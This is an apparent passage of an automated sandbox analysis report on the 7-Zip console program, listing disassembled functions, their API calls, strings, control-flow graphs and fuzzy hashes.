                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowmemmove
                              • String ID: Cannot find archive$Duplicate archive path:
                              • API String ID: 3934437811-2067063536
                              • Opcode ID: 02ef01bc74011ba54d9a35827db376906c3ad96394d31a472ec9f7a70c779f66
                              • Instruction ID: 9056a762c956a731fc1a7e86749da8d3bbac95ea55ad2c47451e112314ed79b5
                              • Opcode Fuzzy Hash: 02ef01bc74011ba54d9a35827db376906c3ad96394d31a472ec9f7a70c779f66
                              • Instruction Fuzzy Hash: 49B1A372715A8582DF60EB16E89055EB3A1F7C5BD0F448512EE8E5BB28DF3CC942EB40
                              Function 00FA70AC Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3207 fa70ac-fa7101 call f76c8c call f73504 call f792d4 3214 fa7103-fa7130 call f73504 call f792d4 3207->3214 3215 fa7166 3207->3215 3214->3215 3229 fa7132-fa715f call f73504 call f792d4 3214->3229 3216 fa7169-fa716d 3215->3216 3219 fa716f-fa717c free 3216->3219 3220 fa717d-fa7181 3216->3220 3219->3220 3222 fa7183-fa7190 free 3220->3222 3223 fa7191-fa7195 3220->3223 3222->3223 3225 fa71a1-fa71a4 3223->3225 3226 fa7197-fa719c free 3223->3226 3227 fa71aa-fa71d2 call f7354c call fa6f74 3225->3227 3228 fa72d3-fa72eb call f736a8 free 3225->3228 3226->3225 3241 fa71ff-fa721c call fa6f74 3227->3241 3242 fa71d4-fa71fa call f736a8 free * 2 3227->3242 3238 fa72ee-fa72f5 3228->3238 3229->3215 3243 fa7161-fa7164 3229->3243 3248 fa7249-fa725f call fa6f74 3241->3248 3249 fa721e-fa7244 call f736a8 free * 2 3241->3249 3242->3238 3243->3216 3254 fa7289-fa729f call fa6f74 3248->3254 3255 fa7261-fa7287 call f736a8 free * 2 3248->3255 3249->3238 3260 fa72c9-fa72ce free 3254->3260 3261 fa72a1-fa72c7 call f736a8 free * 2 3254->3261 3255->3238 3260->3228 3261->3238
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: 7z.dll$Codecs$Formats$Path$Path64
                              • API String ID: 1534225298-3804457719
                              • Opcode ID: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                              • Instruction ID: 9be9b3a36f9096f11e3d0e21d80863c796329dc6893a44281685c187efaac148
                              • Opcode Fuzzy Hash: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                              • Instruction Fuzzy Hash: 8E51B66220870660DA60FB15EC51B6E7721D7C2BE4F845123BD8E477BACE3DC586EB11
                              Function 00FC0FE8 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3264 fc0fe8-fc101e EnterCriticalSection 3265 fc1049-fc1053 3264->3265 3266 fc1020-fc1026 call fcb4d0 3264->3266 3268 fc105a-fc105c 3265->3268 3269 fc1055 call f724a8 3265->3269 3272 fc102b-fc1044 3266->3272 3270 fc1129-fc1136 3268->3270 3271 fc1062-fc106a 3268->3271 3269->3268 3276 fc113c-fc1142 3270->3276 3277 fc11e9-fc11f2 LeaveCriticalSection 3270->3277 3274 fc106c-fc1072 3271->3274 3275 fc10b2-fc10c3 3271->3275 3272->3265 3274->3275 3278 fc1074-fc107a 3274->3278 3281 fc10c5-fc10d2 call f724c4 3275->3281 3282 fc1102-fc110c 3275->3282 3276->3277 3279 fc1148-fc1152 3276->3279 3280 fc11f4-fc11fd 3277->3280 3285 fc107c-fc1083 3278->3285 3286 fc1085 3278->3286 3283 fc11cc-fc11e7 LeaveCriticalSection 3279->3283 3287 fc1154-fc1172 call f724c4 fputs 3279->3287 3281->3282 3296 fc10d4-fc10fd fputs call f7263c call f724c4 3281->3296 3282->3283 3284 fc1112-fc1119 3282->3284 3283->3280 3284->3283 3289 fc111f-fc1124 call f724a8 3284->3289 3290 fc108c-fc1096 3285->3290 3286->3290 3299 fc118d-fc11af call f85f6c call f72790 free 3287->3299 3300 fc1174-fc118b fputs 3287->3300 3289->3283 3290->3282 3294 fc1098-fc10ab fputs call f724c4 3290->3294 3302 fc10b0 3294->3302 3296->3282 3303 fc11b4-fc11c7 call f724c4 call f724a8 3299->3303 3300->3303 3302->3282 3303->3283
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC100F
                              • fputs.MSVCRT ref: 00FC10A2
                              • LeaveCriticalSection.KERNEL32 ref: 00FC11DF
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • fputs.MSVCRT ref: 00FC10E5
                                • Part of subcall function 00F7263C: fputs.MSVCRT ref: 00F7265D
                              • fputs.MSVCRT ref: 00FC1166
                              • fputs.MSVCRT ref: 00FC1185
                              • LeaveCriticalSection.KERNEL32 ref: 00FC11EC
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FC11AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                              • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                              • API String ID: 676172275-580504279
                              • Opcode ID: b8eea50c4c6cd9087f22b0f32f578737f81bfeb1d54a6a64280437262d46ebd7
                              • Instruction ID: 90f5133a8e668835235661638bdf062126b98a68716d2f98bf20e0554b964846
                              • Opcode Fuzzy Hash: b8eea50c4c6cd9087f22b0f32f578737f81bfeb1d54a6a64280437262d46ebd7
                              • Instruction Fuzzy Hash: 05518322700A82A2DB6DDF25DA917AC7325F746BA0F18812BCB1E47652CF3CD4B4E301
                              Function 00FB3616 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 324COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3313 fb3616-fb3634 3315 fb3649-fb364c 3313->3315 3316 fb3636-fb3644 3313->3316 3317 fb364e 3315->3317 3318 fb3654-fb371f call f9c944 memmove call f73798 call fb2710 3315->3318 3316->3315 3317->3318 3326 fb3953-fb3a0a call f73798 * 3 free * 2 call f9ca94 3318->3326 3327 fb3725-fb3727 3318->3327 3368 fb3a0c-fb3a12 3326->3368 3369 fb3a13-fb3a1b 3326->3369 3329 fb372d-fb3743 call fab3b4 3327->3329 3330 fb3a40-fb3a6f free * 2 call f9ca94 3327->3330 3340 fb3749-fb3763 call fb5a44 call f72350 3329->3340 3341 fb3aa3-fb3ad2 free * 2 call f9ca94 3329->3341 3338 fb3a78-fb3a80 3330->3338 3339 fb3a71-fb3a77 3330->3339 3345 fb3a89-fb3a94 3338->3345 3346 fb3a82-fb3a88 3338->3346 3339->3338 3365 fb377a 3340->3365 3366 fb3765-fb3778 call fab8e4 3340->3366 3356 fb3adb-fb3ae3 3341->3356 3357 fb3ad4-fb3ada 3341->3357 3347 fb3a9c-fb3a9e 3345->3347 3348 fb3a96 3345->3348 3346->3345 3355 fb3b79-fb3b8c 3347->3355 3348->3347 3361 fb3aec-fb3af7 3356->3361 3362 fb3ae5-fb3aeb 3356->3362 3357->3356 3363 fb3af9 3361->3363 3364 fb3aff-fb3b01 3361->3364 3362->3361 3363->3364 3364->3355 3373 fb3b6d-fb3b76 3364->3373 3374 fb377d-fb37bc free * 2 call f9ca94 3365->3374 3366->3374 3368->3369 3370 fb3a1d-fb3a23 3369->3370 3371 fb3a24-fb3a2f 3369->3371 3370->3371 3371->3373 3377 fb3a35-fb3a3b 3371->3377 3373->3355 3383 fb37be-fb37c4 3374->3383 3384 fb37c5-fb37cd 3374->3384 3377->3373 3383->3384 3385 fb37cf-fb37d5 3384->3385 3386 fb37d6-fb37e7 3384->3386 3385->3386 3387 fb3309-fb3398 memmove 3386->3387 3388 fb37ed-fb37f3 3386->3388 3393 fb339a-fb33b7 memmove 3387->3393 3394 fb33b9-fb33d7 memmove 3387->3394 3388->3387 3395 fb33dd-fb344e memmove call faaec4 call f73798 * 2 call fb2a28 3393->3395 3394->3373 3394->3395 3405 fb3453-fb3457 3395->3405 3406 fb37f8-fb37fb 3405->3406 3407 fb345d-fb3477 call fb5a44 call f72350 3405->3407 3408 fb3801-fb3886 call f73798 * 3 3406->3408 3409 fb3887-fb3896 call f9ca94 3406->3409 3420 fb3479-fb348c call fab8e4 3407->3420 3421 fb348e 3407->3421 3408->3409 3409->3355 3424 fb3491-fb34ae call f9ca94 3420->3424 3421->3424
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-3916222277
                              • Opcode ID: 5d5191459519a297f3b25da9133d6317b9fa33fcd80151dac8de26295ebe207b
                              • Instruction ID: d9f118af3153c6f9657cf127318a78c87327e5c0d7042e88f5363c260c26341b
                              • Opcode Fuzzy Hash: 5d5191459519a297f3b25da9133d6317b9fa33fcd80151dac8de26295ebe207b
                              • Instruction Fuzzy Hash: 70D17977209BC496CB61EB2AE49029EBB60F3C5B84F544016DB8E47B29CF7CC959DB10
                              Function 00FA93B8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 186libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3429 fa93b8-fa93dc 3430 fa93de 3429->3430 3431 fa93e2-fa93e5 3429->3431 3430->3431 3432 fa93eb-fa940f call f76bac 3431->3432 3433 fa9479-fa9497 call fb5a44 call f72350 3431->3433 3438 fa946c-fa9474 call f76b80 3432->3438 3439 fa9411-fa941e GetLastError 3432->3439 3447 fa9499-fa94a4 call fa7c28 3433->3447 3448 fa94a6 3433->3448 3438->3433 3442 fa9458-fa9467 call f76b80 3439->3442 3443 fa9420-fa9455 call fa84d8 call f73798 call f72e68 3439->3443 3456 fa9660-fa966e 3442->3456 3443->3442 3449 fa94a9-fa94e4 call f73798 call f76bf0 3447->3449 3448->3449 3463 fa94ea-fa94f4 call fa76d4 3449->3463 3464 fa9607-fa960d call fa8b28 3449->3464 3469 fa9522-fa952a 3463->3469 3470 fa94f6-fa951d call fa84d8 call f73798 call f72e68 3463->3470 3468 fa9612-fa9615 3464->3468 3471 fa965e 3468->3471 3472 fa9617-fa962e 3468->3472 3473 fa952e-fa9536 3469->3473 3474 fa952c 3469->3474 3470->3472 3471->3456 3476 fa965a 3472->3476 3477 fa9630-fa9637 3472->3477 3478 fa9538-fa954c GetProcAddress 3473->3478 3479 fa9550-fa9557 3473->3479 3474->3473 3476->3471 3481 fa9639-fa963f 3477->3481 3482 fa9640-fa9655 free call f76b80 free 3477->3482 3478->3479 3484 fa954e 3478->3484 3485 fa9559-fa956d GetProcAddress 3479->3485 3486 fa957c-fa95be GetProcAddress call fa88b0 3479->3486 3481->3482 3482->3476 3484->3479 3485->3486 3489 fa956f-fa9577 3485->3489 3496 fa95ea-fa9605 call fa84d8 call f73798 3486->3496 3497 fa95c0-fa95c6 3486->3497 3489->3486 3496->3468 3497->3468 3499 fa95c8-fa95ce call fa8cbc 3497->3499 3502 fa95d3-fa95e8 3499->3502 3502->3468 3502->3496
                              APIs
                              • GetProcAddress.KERNEL32 ref: 00FA9543
                              • GetProcAddress.KERNEL32 ref: 00FA9564
                              • GetProcAddress.KERNEL32 ref: 00FA9587
                              • free.MSVCRT ref: 00FA9644
                              • GetLastError.KERNEL32 ref: 00FA9411
                                • Part of subcall function 00F76B80: FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FA9655
                              Strings
                              • CreateObject, xrefs: 00FA957C
                              • cannot load file as datafile library, xrefs: 00FA943B
                              • SetLargePageMode, xrefs: 00FA9538
                              • the module is not compatible with program, xrefs: 00FA9511
                              • SetCaseSensitive, xrefs: 00FA9559
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProcfree$ExceptionThrow$ErrorFreeLastLibrarymallocmemmove
                              • String ID: CreateObject$SetCaseSensitive$SetLargePageMode$cannot load file as datafile library$the module is not compatible with program
                              • API String ID: 3132779546-1792956296
                              • Opcode ID: 63d204618bee00d17c5fe925bad3415d2d25ab2e0195b3636da510523415ed45
                              • Instruction ID: 5ebf7bc21863b6018e6e2fcffcd36df2dc26e29034dd617b2200b75ad0f5a103
                              • Opcode Fuzzy Hash: 63d204618bee00d17c5fe925bad3415d2d25ab2e0195b3636da510523415ed45
                              • Instruction Fuzzy Hash: 0E61F2A2704B4196DF14EF26D95436D33A0FB86BA4F4485369E4E87B51EF7CC866E300
                              Function 00FA88B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 149libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA88E1
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA88F6
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA890B
                              • GetProcAddress.KERNEL32 ref: 00FA8936
                              • memmove.MSVCRT ref: 00FA8A59
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA8A8C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc$memmove
                              • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                              • API String ID: 2879976980-73314117
                              • Opcode ID: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                              • Instruction ID: 74d2c35a450ff62f2e8f1dfde70b1650de3ba378ba39e3aed46280054596bdec
                              • Opcode Fuzzy Hash: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                              • Instruction Fuzzy Hash: DB519073614A8096CB21DF14E8847AEB761F3857E4F510223EA8E87B68DFBCC946D740
                              Function 00FC96A5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowfputcfputs
                              • String ID: Decoding ERROR
                              • API String ID: 169956451-2585761706
                              • Opcode ID: 623189c2735957ce6d47dc01e818d6f3c04ed063bef58c32d71f12519500821d
                              • Instruction ID: 7fba03cfcc54b14e09391f9282e9f6e23776bd7c087bf0af08dca9a253830db2
                              • Opcode Fuzzy Hash: 623189c2735957ce6d47dc01e818d6f3c04ed063bef58c32d71f12519500821d
                              • Instruction Fuzzy Hash: E731C722715ACB82DA70EB22ED927AE7310FBC1BA4F444036CA4D47A55DE3DC846E701
                              Function 00FC1358 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC149D
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • fputs.MSVCRT ref: 00FC15A4
                              • fputs.MSVCRT ref: 00FC16C0
                              • fputs.MSVCRT ref: 00FC1715
                                • Part of subcall function 00FC0EB4: fputs.MSVCRT ref: 00FC0EDC
                                • Part of subcall function 00FC0EB4: fputs.MSVCRT ref: 00FC0EF0
                                • Part of subcall function 00FC0EB4: free.MSVCRT ref: 00FC0F03
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • free.MSVCRT ref: 00FC173F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputcmemset
                              • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                              • API String ID: 738794847-24972044
                              • Opcode ID: 63d931e40ab137ac4ad2aaeaa4d4481ac25bc032c224e5a28df5bc161436282c
                              • Instruction ID: cab52d468764597cf7adbe4f96ebaf01c42ccb615e42da882b68bed1f926b1ad
                              • Opcode Fuzzy Hash: 63d931e40ab137ac4ad2aaeaa4d4481ac25bc032c224e5a28df5bc161436282c
                              • Instruction Fuzzy Hash: 83A19266B00AC296CA6CDF35DA927AD7321F786790F18402BDB5E07642CF78D8B4E311
                              Function 00FCB774 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                              • strcmp.MSVCRT ref: 00FCB9EA
                              • fputs.MSVCRT ref: 00FCBA0B
                              • GetTickCount.KERNEL32 ref: 00FCB794
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00F73C68: memmove.MSVCRT(00F7B159), ref: 00F73CA7
                                • Part of subcall function 00F73EC0: memmove.MSVCRT ref: 00F73F06
                              • strcmp.MSVCRT ref: 00FCB7DA
                              • wcscmp.MSVCRT ref: 00FCB7FA
                              • strcmp.MSVCRT ref: 00FCB862
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                              • String ID: . $[Content]
                              • API String ID: 591578422-2304726976
                              • Opcode ID: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                              • Instruction ID: 69eb95d43804fcb78da14887854278c22083a391e62733c3fdf81d6eb0abbd7a
                              • Opcode Fuzzy Hash: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                              • Instruction Fuzzy Hash: 8C814877700642A7CA28DF3ACA82BAC7365F784794F409016DB4D47A10DF38E9B6E701
                              Function 00FA8580 Relevance: 13.6, APIs: 9, Instructions: 104COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmovewcscmp
                              • String ID:
                              • API String ID: 3584677832-0
                              • Opcode ID: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                              • Instruction ID: 7577bdac109f09f6c14ce00ab7b6e0481a330bbf8c8d39b4f5c043f15b7c4313
                              • Opcode Fuzzy Hash: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                              • Instruction Fuzzy Hash: 59417CA2714B4192DB50DF15E89031EB720FBC6BE0F544222EA9E47B68DF7DC946DB10
                              Function 00FC7CC0 Relevance: 11.3, APIs: 9, Instructions: 63COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FC7CE5
                              • free.MSVCRT ref: 00FC7CEE
                              • free.MSVCRT ref: 00FC7D21
                              • free.MSVCRT ref: 00FC7D2E
                              • free.MSVCRT ref: 00FC7D5A
                              • free.MSVCRT ref: 00FC7D62
                              • free.MSVCRT ref: 00FC7D6A
                              • free.MSVCRT ref: 00FC7D77
                              • free.MSVCRT ref: 00FC7D80
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17B7
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17BF
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17CC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17F8
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1801
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1809
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1816
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                              • Instruction ID: 1df4040b10c75953df4181e7e484f5ad53ee7f67e5317766e91925e0a7de49c1
                              • Opcode Fuzzy Hash: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                              • Instruction Fuzzy Hash: 8111CD23B05B4985CBA1BF26DD4236C7321EB80FA4F18412A9E0E1B325DF29CC53A350
                              Function 00FC2B78 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC2C2D
                              • fputs.MSVCRT ref: 00FC2C4C
                              • free.MSVCRT ref: 00FC2C65
                              • free.MSVCRT ref: 00FC2C70
                                • Part of subcall function 00F72E68: free.MSVCRT ref: 00F72EA0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • free.MSVCRT ref: 00FC2C7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputs
                              • String ID: =
                              • API String ID: 2444650769-2525689732
                              • Opcode ID: d441028ad3f2f0400f3afa8231183c8378e0facdd0e5135b5b68a102143ceedc
                              • Instruction ID: 648421f900e5d37037ad729baf237f2606c451085e46fd6111d8c757083dc031
                              • Opcode Fuzzy Hash: d441028ad3f2f0400f3afa8231183c8378e0facdd0e5135b5b68a102143ceedc
